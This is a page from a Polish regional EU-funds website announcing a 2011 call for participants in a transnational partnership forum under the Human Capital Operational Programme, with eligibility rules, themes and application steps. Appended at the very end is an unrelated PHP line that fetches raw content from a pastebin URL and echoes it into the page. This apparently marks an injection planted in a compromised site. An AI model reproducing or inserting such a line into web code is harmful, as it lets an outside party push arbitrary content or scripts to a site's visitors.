Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

15.02.2011 Ogłoszenie o naborze uczestników na II Ponadnarodowe Forum Partnerskie

Krajowa Instytucja Wspomagająca ogłasza nabór uczestników na II Ponadnarodowe Forum Partnerskie. Forum odbędzie na przełomie I i II kwartału br., w Warszawie. Celem Forum jest stworzenie możliwości zawiązania partnerstw projektowych, do projektów współpracy ponadnarodowej realizowanych w ramach Programu Operacyjnego Kapitał Ludzki. W spotkaniu oprócz instytucji polskich wezmą udział projektodawcy ze Szwecji, Finlandii oraz Niemiec (prawdopodobnie region Turyngii) i Litwy. Udział poszczególnych krajów może jeszcze podlegać pewnym modyfikacjom, niemniej przewidujemy, że na Forum będzie reprezentowanych w sumie ok. 85 instytucji, w tym ok. 40 z Polski i 45 z zagranicy.

Warunki naboru:

W Forum mogą wziąć udział zarówno podmioty:

 

  • realizujące projekty w ramach PO KL, chcące rozszerzyć je o komponent ponadnarodowy (przed złożeniem zgłoszenia proponujemy sprawdzenie z IP/IP2 możliwość rozszerzenia projektu o komponent)
  • podmioty o przyznanym dofinansowaniu, ale bez podpisanej umowy
  • podmioty planujące składanie wniosku w 2011 r.

Wstępny zakres obszarów tematycznych na Forum został określony na podstawie tematów konkursów ogłoszonych u partnerów ponadnarodowych i dotyczy między innymi:

  • Adaptacyjność, podnoszenie kwalifikacji i kompetencji pracowników, pracodawców i przedsiębiorstw
  • Modernizacja instytucji rynku pracy
  • Integracja społeczna
  • Tworzenie sieci krajowych i ponadnarodowych na rzecz zapewnienia wsparcia w zakresie zapotrzebowania na siłę roboczą, mobilność siły roboczej
  • Zarządzanie wiedzą, podnoszenie kwalifikacji i kompetencji MŚP

Należy podkreślić, że nie jest to zamknięta lista obszarów i tematów. Stąd też gorąco zachęcamy Państwa do przesyłania fiszek projektowych nawet jeśli w chwili obecnej dany projekt nie wpisuje się bezpośrednio w w/w tematy. Wszystkie fiszki projektowe będą gromadzone w bazie danych Krajowej Instytucji Wspomagającej i analizowane, dając możliwość znalezienia partnera nie tylko podczas planowanego Forum.

O zakwalifikowaniu instytucji do uczestnictwa w Forum będzie decydować dopasowanie do fiszek partnerów ponadnarodowych, które spływają równolegle oraz kolejność zgłoszeń.  Ze względów logistycznych, po zakończeniu rekrutacji i stworzeniu listy uczestników Forum, zostanie stworzona lista rezerwowa. W razie rezygnacji z uczestnictwa w Forum, któregoś z uczestników na jego miejsce zostanie przyjęta kolejna instytucja z listy rezerwowej.

W celu zgłoszenia proszę wypełnić po angielsku załączoną fiszkę i przesłać ją do dnia 1 marca br., na adres: maciej.zmyslowski@cpe.gov.pl 

Dokument do pobrania ( fiszka) 

Uwaga:
Językiem Forum będzie język angielski. Każda zakwalifikowana instytucji może delegować na Forum tylko jedną osobą. Przesłane do nas fiszki zostaną upublicznione na naszym portalu, zarówno fiszki instytucji zakwalifikowanych (z propozycją doboru partnerów do rozmów), jak i znajdujących się na liście rezerwowej (w części portalu poświęconej szukaniu partnerów ponadnarodowych). Przesłanie fiszki jest rozumiane jako zgoda na jej upublicznienie. Podkreślamy również, że Krajowa Instytucja Wspomagająca, będzie wspierać danego beneficjenta w poszukiwaniu partnerów.


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");